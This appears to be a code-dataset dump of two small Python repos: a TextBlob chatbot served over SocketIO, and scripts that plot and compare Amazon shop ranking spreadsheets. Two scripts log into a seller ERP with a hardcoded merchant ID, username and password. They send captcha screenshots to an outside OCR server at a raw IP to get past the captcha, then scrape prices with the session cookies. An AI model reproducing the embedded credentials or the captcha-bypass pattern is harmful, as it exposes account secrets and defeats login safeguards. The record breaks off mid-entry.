"text": "certifi==2020.6.20\nchardet==3.0.4\nclick==7.1.2\ndnspython==1.16.0\neventlet==0.29.1\ngreenlet==0.4.17\nidna==2.10\njoblib==0.17.0\nnltk==3.5\npython-engineio==3.13.2\npython-socketio==4.6.0\nregex==2020.11.13\nrequests==2.24.0\nsix==1.15.0\ntextblob==0.15.3\ntqdm==4.53.0\nurllib3==1.25.11\nwebsocket-client==0.57.0\n"
},
{
"alpha_fraction": 0.6147540807723999,
"alphanum_fraction": 0.6475409865379333,
"avg_line_length": 23.600000381469727,
"blob_id": "357c12bb9c19a45d1b28f04d7efe9c18b4258745",
"content_id": "eb228ed684f4cefceac6164e9e264c1b76ea723b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 122,
"license_type": "no_license",
"max_line_length": 58,
"num_lines": 5,
"path": "/run.py",
"repo_name": "gormlabenz/chat-textblob",
"src_encoding": "UTF-8",
"text": "from app import app\nimport eventlet\n\nif __name__ == \"__main__\":\n eventlet.wsgi.server(eventlet.listen((\"\", 5000)), app)"
},
{
"alpha_fraction": 0.762135922908783,
"alphanum_fraction": 0.7815533876419067,
"avg_line_length": 24.875,
"blob_id": "6b7e1a6cd249e742e2849d9e4b929e8a762afafb",
"content_id": "df7022606f26f47961d8929cf5302c9be8fa2d59",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 206,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 8,
"path": "/app/__init__.py",
"repo_name": "gormlabenz/chat-textblob",
"src_encoding": "UTF-8",
"text": "import socketio\nfrom app.chatbot import Chatbot\n\nsio = socketio.Server(cors_allowed_origins=\"http://localhost:8080\")\napp = socketio.WSGIApp(sio)\nchatbot = Chatbot('app/intents.json')\n\nfrom app import events"
},
{
"alpha_fraction": 0.5441375970840454,
"alphanum_fraction": 0.5450429916381836,
"avg_line_length": 27.688312530517578,
"blob_id": "8f3a55b8a73878bb23bb4762c9542b73cffcf987",
"content_id": "0b05cd2b4b733e845fa02cc18d82ea80a9051049",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2209,
"license_type": "no_license",
"max_line_length": 95,
"num_lines": 77,
"path": "/app/chatbot.py",
"repo_name": "gormlabenz/chat-textblob",
"src_encoding": "UTF-8",
"text": "from textblob.classifiers import NaiveBayesClassifier\nimport json\nimport random\nfrom pathlib import Path\nimport pprint\n\n\nclass Chatbot:\n def __init__(self, intents):\n \"\"\"\n The Chatbot class. Insert a json file in a specific format. The Chatbot will be trained\n to find a pattern in a given text string and return a response.\n Define the patterns the bot should find. Then set the answers it should give\n and give them both a suitable label.\n\n The format of the json file:\n\n {\n \"intents\": [\n {\n \"label\": \"greeting\",\n \"patterns\": [\n \"Hi\",\n \"How are you\",\n ],\n \"responses\": [\n \"Hello!\",\n \"Good to see you again!\",\n ],\n }\n\n :param intents: A json file with the intents. Use the specific format.\n\n \"\"\"\n file_path = Path.cwd() / intents\n\n with open(file_path, \"r\") as file:\n self.data = json.load(file)\n\n self.classifier = self.train()\n\n def train(self):\n \"\"\"\n Train a classifier dependeding on the data\n \"\"\"\n train = []\n\n for intent in self.data[\"intents\"]:\n for pattern in intent[\"patterns\"]:\n train.append((pattern, intent[\"label\"]))\n\n pprint.pprint(train)\n cl = NaiveBayesClassifier(train)\n print('Accuracity: ', cl.accuracy(train))\n cl.show_informative_features(5) \n return cl\n\n def chat(self, input_text):\n \"\"\"\n Insert a string and get a response\n\n :param input_text: A string that the response depends on\n \"\"\"\n label = self.classifier.classify(input_text)\n return self.get_response(label)\n\n def get_response(self, label):\n \"\"\"\n Insert a label defined in the intent data and get a random response\n\n :param label: The label of tha you want a response\n \"\"\"\n intents = self.data[\"intents\"]\n responses = [\n intent[\"responses\"] for intent in intents if intent[\"label\"] == label\n ]\n return random.choice(responses[0])\n"
},
{
"alpha_fraction": 0.7208201885223389,
"alphanum_fraction": 0.7239747643470764,
"avg_line_length": 15.256410598754883,
"blob_id": "b0323de5893272b350c317095eff381bafe501e0",
"content_id": "b0df27a342e2a581438239ccd53b35352ad7c4fb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 634,
"license_type": "no_license",
"max_line_length": 102,
"num_lines": 39,
"path": "/README.md",
"repo_name": "gormlabenz/chat-textblob",
"src_encoding": "UTF-8",
"text": "# Chat-Textblob\n\nA simple Chatbot with a Frontend build with VueJS and a backend build with Pathon Textblob library.\nIt uses a SocketIO connection for the realtime connection between the frontend and the backend server.\n\n## Project setup\n\n```\nnpm install\npip3 install -r requirements.txt\n```\n\n### Start the backend server\n\n```\npython3 app/app.py\n```\n\n### Compiles and hot-reloads for frontend development\n\n```\nnpm run serve\n```\n\n### Compiles and minifies for production\n\n```\nnpm run build\n```\n\n### Lints and fixes files\n\n```\nnpm run lint\n```\n\n### Customize configuration\n\nSee [Configuration Reference](https://cli.vuejs.org/config/).\n"
}
] | 6 |
ianctse/apollo | https://github.com/ianctse/apollo | 0159f9fa2374c70a8f65007291d0705b52bac72c | 4e2c60691c8cfe0d81d8667bfb9891e15f133a4e | 3ee6025b6663f147bb0225fa5485f409677b599e | refs/heads/master | 2020-04-17T13:45:14.577786 | 2019-01-20T09:07:44 | 2019-01-20T09:07:44 | 166,628,994 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.7804877758026123,
"alphanum_fraction": 0.7804877758026123,
"avg_line_length": 19.5,
"blob_id": "24e1d90f25d6b8377a0375b893ab5a148f27c185",
"content_id": "483a839212a1256089674a485d822adcf6bf6b72",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 41,
"license_type": "permissive",
"max_line_length": 31,
"num_lines": 2,
"path": "/README.md",
"repo_name": "ianctse/apollo",
"src_encoding": "UTF-8",
"text": "# apollo\nTools for analyzing solar data.\n"
},
{
"alpha_fraction": 0.5925925970077515,
"alphanum_fraction": 0.6018518805503845,
"avg_line_length": 20.600000381469727,
"blob_id": "54b1768d96bd4bc766b9960b09c464d323baf7ed",
"content_id": "686ddf053f1749389d19bc9247a22ca3de4e930b",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 216,
"license_type": "permissive",
"max_line_length": 46,
"num_lines": 10,
"path": "/setup.py",
"repo_name": "ianctse/apollo",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n\nfrom setuptools import setup\n\nsetup(name='apollo',\n version='0.1',\n author='Ian Tse',\n author_email='[email protected]',\n url='https://github.com/ianctse/apollo',\n license='MIT')\n"
}
] | 2 |
zhengquantao/DataDisplay | https://github.com/zhengquantao/DataDisplay | b7d72216442ecce4698719f7195d50bb8fe17c3d | 962d798461630c91694dc87cb967eabbf032051f | ce8dc3ef644ccf2acd319066fd143e1c2f413fd6 | refs/heads/master | 2020-11-24T23:18:43.245265 | 2019-12-27T04:21:29 | 2019-12-27T04:21:29 | 228,382,778 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5419819951057434,
"alphanum_fraction": 0.5589188933372498,
"avg_line_length": 28.221052169799805,
"blob_id": "eee686b1a9f5f1cca15a2c86cb229b4f37133719",
"content_id": "31cab60640080c38f0673c0c687ed96b3425ee50",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2993,
"license_type": "no_license",
"max_line_length": 97,
"num_lines": 95,
"path": "/file.py",
"repo_name": "zhengquantao/DataDisplay",
"src_encoding": "UTF-8",
"text": "import os\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\n\ndef find_file(file: str, name: str):\n mul_file_name = os.walk(file)\n frame = list() # 所有dataframe数组\n for filename in mul_file_name:\n if filename[2]:\n # datetime.append(filename[0][5:])\n for document_name in filename[2]:\n if name == document_name:\n data = pd.read_excel(filename[0]+\"\\\\\"+document_name)\n data[\"date\"] = filename[0][5:] # 加入时间\n frame.append(data)\n break\n result = pd.concat(frame)\n group_data = result.groupby(['ASIN'])\n names = name.split(\".\")[0]\n for good in group_data:\n # if i[0] == \"B07B5Y57DC\":\n # print(i[1])\n create_file(\"image/\"+names)\n plot(good[1], names, good[0])\n\n\ndef create_file(file: str):\n \"\"\"\n 创建文件夹\n file: 文件夹\n \"\"\"\n if not os.path.isdir(file):\n os.makedirs(file)\n\n\ndef plot(data: object, filename: str, name: str):\n \"\"\"\n 展示数据\n data: 数据\n datetime: 时间\n filename: 文件夹\n name: 文件名\n \"\"\"\n shop_score = data['评分'].fillna('0')\n shop_comment = data['评论数'].fillna('0')\n shop_big_ranking = data['大类排名'].fillna('0')\n shop_small_ranking = data['小类排名'].fillna('0')\n datetime = data['date'].fillna('0')\n\n fig = plt.figure(figsize=(11, 6))\n (ax1, ax2, ax3, ax4) = fig.subplots(nrows=4)\n plt.rcParams['font.sans-serif'] = ['SimHei']\n\n ax1.plot(datetime, shop_score, \"red\", label=\"评分\")\n ax1.legend(title=\"评分\")\n ax1.grid(True)\n\n ax2.plot(datetime, shop_comment, \"red\", label=\"评论数\")\n ax2.legend(title=\"评论数\")\n ax2.grid(True)\n\n ax3.plot(datetime, shop_big_ranking, \"red\", label=\"大类\")\n ax3.grid(True)\n ax3.legend(title=\"大类\")\n\n ax4.plot(datetime, shop_small_ranking, \"red\", label=\"小类\")\n ax4.grid(True)\n ax4.legend(title=\"小类\")\n\n # multi = MultiCursor(fig.canvas, (ax1, ax2, ax3, ax4), color='r', lw=1, linestyle=':',\n # horizOn=False, vertOn=True)\n\n plt.xlabel(name)\n plt.savefig('./image/'+filename+'/'+name+'.png')\n plt.cla()\n plt.close()\n # plt.show()\n\n\n# find_file(\"shop\")\n\nname_list = ['DJ(FR).xlsx', 'DJ(德国).xlsx', 'DJ(英国).xlsx', 'DreamJ(加拿大).xlsx', 'DreamJ(美国).xlsx',\n 'FOR(日本).xlsx', 'Formemory(加拿大).xlsx', 'Formemory(美国).xlsx', 'HAPYSHOP(日本).xlsx',\n 'HOM(日本).xlsx', 'Housestory(加拿大).xlsx', 'Housestory(美国).xlsx', 'houstory(德国).xlsx',\n 'houstory(意大利).xlsx', 'houstory(英国).xlsx', 'houstory(西班牙).xlsx', 'Kicpot(加拿大).xlsx',\n 'Kicpot(美国).xlsx', 'SHENGO(日本).xlsx', 'Tumao(日本).xlsx']\n\nimport time\nfor i in name_list:\n start = time.time()\n find_file(\"shop\", i)\n end = time.time()\n result = end-start\n print(i, \" 所花时间\", result)"
},
{
"alpha_fraction": 0.5184118151664734,
"alphanum_fraction": 0.5472946763038635,
"avg_line_length": 36.45189666748047,
"blob_id": "5f93e923dcebc05d9788570c27527f148a34ba8b",
"content_id": "3d9ba19ccc6f9f8e2b65211d8186883f3b0233f0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 13333,
"license_type": "no_license",
"max_line_length": 118,
"num_lines": 343,
"path": "/tumao_data_display/compare_xlsx.py",
"repo_name": "zhengquantao/DataDisplay",
"src_encoding": "UTF-8",
"text": "import os\nimport pandas as pd\nimport random\nimport numpy as np\nimport xlwt\nimport json\nimport time\nimport requests\nfrom PIL import Image\nfrom bs4 import BeautifulSoup\nfrom selenium import webdriver\nfrom selenium.common.exceptions import UnexpectedAlertPresentException\nfrom selenium.webdriver.support.wait import WebDriverWait\nfrom selenium.webdriver import DesiredCapabilities\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.by import By\n\n# 变化范围 [评分(升,降), 评论数(升,降), 大类排名(升,降), 小类排名(升,降)]\nchange_range = [(1, 1), (10, 10), (1000, 1000), (1000, 1000)]\n\n\n# 登录\ndef login():\n options = webdriver.ChromeOptions()\n options.add_argument('--disable-gpu')\n options.add_argument(\"disable-web-security\")\n options.add_argument('disable-infobars')\n options.add_experimental_option('excludeSwitches', ['enable-automation'])\n capa = DesiredCapabilities.CHROME\n capa[\"pageLoadStrategy\"] = \"none\"\n driver = webdriver.Chrome(chrome_options=options, desired_capabilities=capa)\n wait = WebDriverWait(driver, 30)\n driver.maximize_window()\n\n login_url = \"http://gg7.irobotbox.com/Manager/Login.aspx\"\n driver.get(login_url)\n while True:\n # 商家号\n wait.until(EC.presence_of_element_located((By.CSS_SELECTOR, \"#TextCustomerID\")))\n TextCustomerID = driver.find_element_by_css_selector(\"#TextCustomerID\")\n TextCustomerID.send_keys(\"1921\")\n\n # 用户名\n wait.until(EC.presence_of_element_located((By.CSS_SELECTOR, \"#TextAdminName\")))\n TextAdminName = driver.find_element_by_css_selector(\"#TextAdminName\")\n TextAdminName.send_keys(\"text\")\n\n # 密码\n wait.until(EC.presence_of_element_located((By.CSS_SELECTOR, \"#TextPassword\")))\n TextPassword = driver.find_element_by_css_selector(\"#TextPassword\")\n TextPassword.send_keys(\"tm201606\")\n\n # 识别验证码\n time.sleep(1)\n wait.until(EC.presence_of_element_located((By.CSS_SELECTOR, \"#captchaImage\")))\n captchaImage = driver.find_element_by_css_selector(\"#captchaImage\")\n location = captchaImage.location\n size = captchaImage.size\n left = location['x']\n top = location['y']\n right = location['x'] + size['width']\n bottom = location['y'] + size['height']\n driver.get_screenshot_as_file('a.png')\n a = Image.open(\"a.png\")\n a = a.convert('L')\n im = a.crop((left, top, right, bottom))\n im.save('a.png')\n f = open('a.png', 'rb')\n response = requests.post(url=\"http://182.61.174.27:7788/\", data=f.read())\n text = json.loads(response.text)\n print(text['code'])\n\n # 输入验证码\n txtValidate = driver.find_element_by_css_selector(\"#txtValidate\")\n txtValidate.send_keys(text['code'])\n\n # 登录按钮\n wait.until(EC.presence_of_element_located((By.CSS_SELECTOR, \"#submit\")))\n submit = driver.find_element_by_css_selector(\"#submit\")\n submit.click()\n time.sleep(2)\n\n try:\n if driver.current_url != login_url:\n cookies = driver.get_cookies()\n cookie = [item[\"name\"] + \"=\" + item[\"value\"] for item in cookies]\n cookie_str = '; '.join(item for item in cookie)\n driver.quit()\n return cookie_str\n\n except UnexpectedAlertPresentException as e:\n print(\"验证码错误\")\n driver.refresh()\n\n\ncookies = login()\n\n\ndef read_file(file: str, name: str):\n mul_file_name = os.walk(file)\n for filename in mul_file_name:\n if filename[2]:\n # datetime.append(filename[0][5:])\n for document_name in filename[2]:\n if name == document_name:\n data = pd.read_excel(filename[0]+\"/\"+document_name)\n return data\n\n\ndef compare_data(file: str, name: str):\n last_week = file[0]\n now_week = file[1]\n before_data = read_file(last_week, name)\n now_data = read_file(now_week, name)\n # print(before_data)\n # print(now_data)\n all_array = list()\n np_before_data = before_data.values\n np_now_data = now_data.values\n n = np.where(np_before_data == \"B07CG9BJ9H\")\n m = np.where(np_now_data == \"B07CG9BJ9H\")\n\n for now_item in np_now_data:\n for before_item in np_before_data:\n if now_item[0] == before_item[0]:\n asin_name = now_item[0]\n asin_score = now_item[1]-before_item[1]\n asin_comment = now_item[2]-before_item[2]\n asin_big_ranking = now_item[3]-before_item[3]\n asin_small_ranking = now_item[4]-before_item[4]\n all_array.append([asin_name, now_item[1], before_item[1], asin_score, '', now_item[2], before_item[2],\n asin_comment, '', now_item[3], before_item[3], asin_big_ranking, '', now_item[4],\n before_item[4], asin_small_ranking])\n break\n else:\n asin_name = now_item[0]\n asin_score = now_item[1] - 0\n asin_comment = now_item[2] - 0\n asin_big_ranking = now_item[3] - 0\n asin_small_ranking = now_item[4] - 0\n all_array.append([asin_name, now_item[1], 0, asin_score, '', now_item[2], 0,\n asin_comment, '', now_item[3], 0, asin_big_ranking, '', now_item[4],\n 0, asin_small_ranking])\n\n for before_item in np_before_data:\n for now_item in np_now_data:\n if now_item[0] == before_item[0]:\n break\n else:\n asin_name = before_item[0]\n asin_score = 0 - before_item[1]\n asin_comment = 0 - before_item[2]\n asin_big_ranking = 0 - before_item[3]\n asin_small_ranking = 0 - before_item[4]\n all_array.append([asin_name, 0, before_item[1], asin_score, '', 0, before_item[2],\n asin_comment, '', 0, before_item[3], asin_big_ranking, '', 0,\n before_item[4], asin_small_ranking])\n\n last_week_date = last_week.split(\"/\")[1]\n create_file(now_week+\"A\"+last_week_date)\n\n wb = xlwt.Workbook(encoding='utf8')\n # 创建一个sheet对象\n sheet = wb.add_sheet('order-sheet')\n\n # 设置文件头的样式,这个不是必须的可以根据自己的需求进行更改\n style_heading = xlwt.easyxf(\"\"\"\n font:\n name Arial,\n colour_index white,\n bold on,\n height 0xA0;\n align:\n wrap off,\n vert center,\n horiz center;\n pattern:\n pattern solid,\n fore-colour 0x19;\n borders:\n left THIN,\n right THIN,\n top THIN,\n bottom THIN; \n \"\"\")\n\n # 不变样式 金色\n style_not_change = xlwt.easyxf(\"\"\"pattern: pattern solid, fore_colour 43\"\"\") # 43\n # 深红\n style_deep_rise = xlwt.easyxf(\"\"\"pattern: pattern solid, fore_colour 3\"\"\") # 6\n # 深绿\n style_deep_drop = xlwt.easyxf(\"\"\"pattern: pattern solid, fore_colour 6\"\"\") # 3\n # 微红\n style_litter_rise = xlwt.easyxf(\"\"\"pattern: pattern solid, fore_colour 42\"\"\") # 45\n # 微绿\n style_litter_drop = xlwt.easyxf(\"\"\"pattern: pattern solid, fore_colour 45\"\"\") # 42\n\n # 写入文件标题\n sheet.write(0, 0, 'ASIN', style_heading)\n sheet.write(0, 1, '标题', style_heading)\n sheet.write(0, 2, \"价格\", style_heading) # 价格\n # sheet.write(0, 3, \"这周价格\", style_heading) # 价格\n # sheet.write(0, 4, \"上周价格\", style_heading) # 价格\n # sheet.write(0, 5, \"\", style_heading) # 价格\n sheet.write(0, 3, '这周评分', style_heading)\n sheet.write(0, 4, '上周评分', style_heading)\n sheet.write(0, 5, '趋势', style_heading)\n sheet.write(0, 6, '', style_heading)\n sheet.write(0, 7, '这周评论数', style_heading)\n sheet.write(0, 8, '上周评论数', style_heading)\n sheet.write(0, 9, '趋势', style_heading)\n sheet.write(0, 10, '', style_heading)\n sheet.write(0, 11, '这周大类排名', style_heading)\n sheet.write(0, 12, '上周大类排名', style_heading)\n sheet.write(0, 13, '趋势', style_heading)\n sheet.write(0, 14, '', style_heading)\n sheet.write(0, 15, '这周小类排名', style_heading)\n sheet.write(0, 16, '上周小类排名', style_heading)\n sheet.write(0, 17, '趋势', style_heading)\n\n # 写入数据\n data_row = 1\n for i in all_array:\n title, price = get_sku(i[0], cookies)\n sheet.write(data_row, 0, i[0])\n sheet.write(data_row, 1, title)\n sheet.write(data_row, 2, price) # 价格\n sheet.write(data_row, 3, i[1])\n sheet.write(data_row, 4, i[2])\n if i[3] > 0:\n if i[3] >= change_range[0][1]:\n sheet.write(data_row, 5, i[3], style_deep_rise)\n else:\n sheet.write(data_row, 5, i[3], style_litter_rise)\n elif i[3] < 0:\n if abs(i[3]) < change_range[0][1]:\n sheet.write(data_row, 5, i[3], style_litter_drop)\n else:\n sheet.write(data_row, 5, i[3], style_deep_drop)\n else:\n sheet.write(data_row, 5, i[3], style_not_change)\n sheet.write(data_row, 6, i[4])\n sheet.write(data_row, 7, i[5])\n sheet.write(data_row, 8, i[6])\n if i[7] > 0:\n if i[7] >= change_range[1][0]:\n sheet.write(data_row, 9, i[7], style_deep_rise)\n else:\n sheet.write(data_row, 9, i[7], style_litter_rise)\n elif i[7] < 0:\n if abs(i[7]) < change_range[1][1]:\n sheet.write(data_row, 9, i[7], style_litter_drop)\n else:\n sheet.write(data_row, 9, i[7], style_deep_drop)\n else:\n sheet.write(data_row, 9, i[7], style_not_change)\n sheet.write(data_row, 10, i[8])\n sheet.write(data_row, 11, i[9])\n sheet.write(data_row, 12, i[10])\n if i[11] > 0:\n if i[11] >= change_range[2][1]:\n sheet.write(data_row, 13, -i[11], style_deep_drop)\n else:\n sheet.write(data_row, 13, -i[11], style_litter_drop)\n elif i[11] < 0:\n if abs(i[11]) < change_range[2][0]:\n sheet.write(data_row, 13, abs(i[11]), style_litter_rise)\n else:\n sheet.write(data_row, 13, abs(i[11]), style_deep_rise)\n else:\n sheet.write(data_row, 13, i[11], style_not_change)\n sheet.write(data_row, 14, i[12])\n sheet.write(data_row, 15, i[13])\n sheet.write(data_row, 16, i[14])\n if i[15] > 0:\n if i[15] >= change_range[3][1]:\n sheet.write(data_row, 17, -i[15], style_deep_drop)\n else:\n sheet.write(data_row, 17, -i[15], style_litter_drop)\n elif i[15] < 0:\n if abs(i[15]) < change_range[3][0]:\n sheet.write(data_row, 17, abs(i[15]), style_litter_rise)\n else:\n sheet.write(data_row, 17, abs(i[15]), style_deep_rise)\n else:\n sheet.write(data_row, 17, i[15], style_not_change)\n data_row = data_row + 1\n\n shop_name = name.split(\".\")[0]\n wb.save(now_week+\"A\"+last_week_date+\"/\"+shop_name+\".xls\")\n\n\ndef create_file(file: str):\n \"\"\"\n 创建文件夹\n file: 文件夹\n \"\"\"\n if not os.path.isdir(file):\n os.makedirs(file)\n\n\ndef random_color():\n \"\"\"\n 颜色函数\n \"\"\"\n color_arr = ['1', '2', '3', '4', '5', '6', '7', '8', '9', 'A', 'B', 'C', 'D', 'E', 'F']\n color = \"\"\n for i in range(6):\n color += color_arr[random.randint(0, 14)]\n return \"#\"+color\n\n\ndef get_sku(asin: str, cookies: str):\n headers = {\n \"Cookie\": cookies\n }\n url = \"http://gg7.irobotbox.com/IrobotBox/Amazon/AmazonListingList.aspx?&SearchType=0&txtNo2=3&txtNo=\"+asin\n html = requests.get(url=url, headers=headers).text\n soup = BeautifulSoup(html, 'lxml')\n try:\n soup_text = soup.select_one('tr[skuinfo*=\"skuinfo\"] td:nth-child(3) p:nth-child(2)')\n price = soup.select_one('input[id*=\"txtPrice\"]').attrs['value']\n title = soup_text.get_text()\n except:\n title = \"\"\n price = \"\"\n return title, price\n\n\nname_list = ['DJ(FR).xlsx', 'DJ(德国).xlsx', 'DJ(英国).xlsx', 'DreamJ(加拿大).xlsx', 'DreamJ(美国).xlsx',\n 'FOR(日本).xlsx', 'Formemory(加拿大).xlsx', 'Formemory(美国).xlsx', 'HAPYSHOP(日本).xlsx',\n 'HOM(日本).xlsx', 'Housestory(加拿大).xlsx', 'Housestory(美国).xlsx', 'houstory(德国).xlsx',\n 'houstory(意大利).xlsx', 'houstory(英国).xlsx', 'houstory(西班牙).xlsx', 'Kicpot(加拿大).xlsx',\n 'Kicpot(美国).xlsx', 'SHENGO(日本).xlsx', 'Tumao(日本).xlsx']\n\n\nimport time\nfor i in name_list:\n start = time.time()\n compare_data([\"week/2019-12-20\", \"week/2019-12-23\"], i)\n end = time.time()\n result = end-start\n print(i, \" 所花时间\", result)"
},
{
"alpha_fraction": 0.5872857570648193,
"alphanum_fraction": 0.6177400350570679,
"avg_line_length": 34.65243911743164,
"blob_id": "50e5666683ad3d646298703fc10d8d8c37aa3e24",
"content_id": "e2019a16c44cab1a552796680aa4335d5e0b07fb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6063,
"license_type": "no_license",
"max_line_length": 126,
"num_lines": 164,
"path": "/tumao_data_display/spider.py",
"repo_name": "zhengquantao/DataDisplay",
"src_encoding": "UTF-8",
"text": "import json\r\nimport time\r\n\r\nimport requests\r\nfrom PIL import Image\r\nfrom bs4 import BeautifulSoup\r\nfrom selenium import webdriver\r\nfrom selenium.common.exceptions import UnexpectedAlertPresentException\r\nfrom selenium.webdriver.support.wait import WebDriverWait\r\nfrom selenium.webdriver import DesiredCapabilities\r\nfrom selenium.webdriver.support import expected_conditions as EC\r\nfrom selenium.webdriver.common.by import By\r\n\r\n\r\ndef login():\r\n options = webdriver.ChromeOptions()\r\n options.add_argument('--disable-gpu')\r\n options.add_argument(\"disable-web-security\")\r\n options.add_argument('disable-infobars')\r\n options.add_experimental_option('excludeSwitches', ['enable-automation'])\r\n capa = DesiredCapabilities.CHROME\r\n capa[\"pageLoadStrategy\"] = \"none\"\r\n driver = webdriver.Chrome(chrome_options=options, desired_capabilities=capa)\r\n wait = WebDriverWait(driver, 30)\r\n driver.maximize_window()\r\n\r\n login_url = \"http://gg7.irobotbox.com/Manager/Login.aspx\"\r\n driver.get(login_url)\r\n\r\n while True:\r\n # 商家号\r\n wait.until(EC.presence_of_element_located((By.CSS_SELECTOR, \"#TextCustomerID\")))\r\n TextCustomerID = driver.find_element_by_css_selector(\"#TextCustomerID\")\r\n TextCustomerID.send_keys(\"1921\")\r\n\r\n # 用户名\r\n wait.until(EC.presence_of_element_located((By.CSS_SELECTOR, \"#TextAdminName\")))\r\n TextAdminName = driver.find_element_by_css_selector(\"#TextAdminName\")\r\n TextAdminName.send_keys(\"text\")\r\n\r\n # 密码\r\n wait.until(EC.presence_of_element_located((By.CSS_SELECTOR, \"#TextPassword\")))\r\n TextPassword = driver.find_element_by_css_selector(\"#TextPassword\")\r\n TextPassword.send_keys(\"tm201606\")\r\n\r\n # 识别验证码\r\n wait.until(EC.presence_of_element_located((By.CSS_SELECTOR, \"#captchaImage\")))\r\n captchaImage = driver.find_element_by_css_selector(\"#captchaImage\")\r\n location = captchaImage.location\r\n size = captchaImage.size\r\n left = location['x']\r\n top = location['y']\r\n right = location['x'] + size['width']\r\n bottom = location['y'] + size['height']\r\n driver.get_screenshot_as_file('a.png')\r\n\r\n a = Image.open(\"a.png\")\r\n a = a.convert('L')\r\n im = a.crop((left, top, right, bottom))\r\n\r\n im.save('a.png')\r\n f = open('a.png', 'rb')\r\n response = requests.post(url=\"http://182.61.174.27:7788/\", data=f.read())\r\n text = json.loads(response.text)\r\n\r\n # 输入验证码\r\n txtValidate = driver.find_element_by_css_selector(\"#txtValidate\")\r\n txtValidate.send_keys(text['code'])\r\n\r\n # 登录按钮\r\n wait.until(EC.presence_of_element_located((By.CSS_SELECTOR, \"#submit\")))\r\n submit = driver.find_element_by_css_selector(\"#submit\")\r\n submit.click()\r\n time.sleep(2)\r\n\r\n try:\r\n if driver.current_url != login_url:\r\n cookies = driver.get_cookies()\r\n cookie = [item[\"name\"] + \"=\" + item[\"value\"] for item in cookies]\r\n cookie_str = '; '.join(item for item in cookie)\r\n return cookie_str\r\n driver.quit()\r\n\r\n except UnexpectedAlertPresentException as e:\r\n print(\"验证码错误\")\r\n time.sleep(2)\r\n driver.refresh()\r\n\r\n\r\ndef get_sku(asin: str, cookies: str):\r\n headers = {\r\n \"Cookie\": cookies\r\n }\r\n url = \"http://gg7.irobotbox.com/IrobotBox/Amazon/AmazonListingList.aspx?&SearchType=0&txtNo2=3&txtNo=\"+asin\r\n html = requests.get(url=url, headers=headers).text\r\n soup = BeautifulSoup(html, 'lxml')\r\n try:\r\n soup_text = soup.select_one('tr[skuinfo*=\"skuinfo\"] td:nth-child(3) p:nth-child(2)')\r\n soup_price = soup.select_one('input[id*=\"txtPrice\"]').attrs['value']\r\n print(soup_text.get_text(), '----', soup_price)\r\n except:\r\n soup_text = \"\"\r\n soup_price = \"\"\r\n return soup_text, soup_price\r\n\r\ncookies = login()\r\nget_sku(\"B07M5XKQ71\", cookies)\r\n\r\n#\r\n# code_url = \"http://gg7.irobotbox.com/Manager/Tools/ValidateCode.ashx\"\r\n#\r\n# login_url = \"http://gg7.irobotbox.com/Manager/Login.aspx\"\r\n#\r\n# index_url = \"http://gg7.irobotbox.com/Manager/index.aspx\"\r\n#\r\n# find_item = \"http://gg7.irobotbox.com/IrobotBox/Amazon/AmazonListingList.aspx?&SearchType=0&txtNo2=3&txtNo=\"\r\n# import requests\r\n# import json\r\n#\r\n# header = {\r\n# \"Accept\": \"*/*\",\r\n# \"Accept-Encoding\": \"gzip, deflate\",\r\n# \"Accept-Language\": \"zh-CN,zh;q=0.9\",\r\n# \"Cache-Control\": \"no-cache\",\r\n# \"Connection\": \"keep-alive\",\r\n# \"Content-Length\": \"40\",\r\n# \"Content-Type\": \"application/x-www-form-urlencoded; charset=UTF-8\",\r\n# \"Host\": \"gg7.irobotbox.com\",\r\n# \"Pragma\": \"no-cache\",\r\n# \"Upgrade-Insecure-Requests\": \"1\",\r\n# \"Cookie\": \"_ati=1353840465818; Hm_lvt_bd5c92691c7aa293cbae57b8424ee1e8=1576805861,1577174104; \\\r\n# irobotbox_cookie_language=zh_CN; ASP.NET_SessionId=dtzj1u0h0wp3ckpwtl4xcana; irobotbox_cookie_time=\\\r\n# 2019-12-26+17%3a03%3a17; ValidCode=2HsNAisFZqw%3d\",\r\n# \"User-Agent\": \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36\"\r\n# }\r\n# session = requests.session()\r\n# login = session.get(login_url, headers=header)\r\n#\r\n# image = session.get(code_url)\r\n# print(login.history)\r\n# response = requests.post(url=\"http://182.61.174.27:7788/\", data=image.content)\r\n#\r\n# code = json.loads(response.text)\r\n# user_msg = {\r\n# \"actions\": \"SendCaptchaCode\", # UserLogin\r\n# \"userLoginView\": {\r\n# \"CustomerId\": \"1921\",\r\n# \"UserName\": \"text\",\r\n# \"Password\": \"tm201606\",\r\n# \"CaptchaCode\": code['code'],\r\n# \"LocalIp\": \"192.168.200.128\",\r\n# \"RedirectUrl\": \"Index.aspx\",\r\n# \"IsNewDeviceLogin\": False,\r\n# }\r\n# }\r\n#\r\n# r = session.post(login_url, data=user_msg)\r\n# print(r.text)\r\n# if r:\r\n# # m = session.get(index_url)\r\n# # print(m.text, m.cookies)\r\n# s = session.get(find_item+\"B07CG9BJ9H\")\r\n# print(s.text)\r\n# print(r)"
},
{
"alpha_fraction": 0.5222499370574951,
"alphanum_fraction": 0.5428978204727173,
"avg_line_length": 35.25161361694336,
"blob_id": "2674d7fed5d584ec1e028bf54cbef5a978d5d101",
"content_id": "1b7dae5521e159780c90004980171b7a891edf3b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
